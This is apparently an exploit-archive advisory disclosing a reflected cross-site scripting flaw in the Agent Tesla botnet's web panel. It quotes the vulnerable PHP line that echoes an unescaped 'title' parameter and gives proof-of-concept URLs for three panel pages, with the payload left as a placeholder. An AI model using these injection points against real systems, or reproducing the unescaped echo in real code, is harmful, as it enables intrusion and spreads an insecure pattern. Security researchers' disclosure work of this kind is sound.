id: 35149
date: 10/31/2020
title: Agent Tesla Botnet Cross Site Scripting Vulnerability
author: n4pst3r
cves: 

################################
# Exploit Title: Agent Tesla Botnet - Cross Site Scripting Vulnerability
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: http://www.agenttesla.com/ ยก Down !
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: http://127.0.0.1/WebPanel/pages/get-log.php
                      /get-screens.php
                      /get-webcams.php

<?php echo $_GET['title']; ?>

################################
PoC:

http://127.0.0.1/WebPanel/pages/get-log.php?title=[XSS]
                 /get-screens.php?title=[XSS]
                 /get-webcams.php?title=[XSS]

#  0day.today [2023-03-25]  #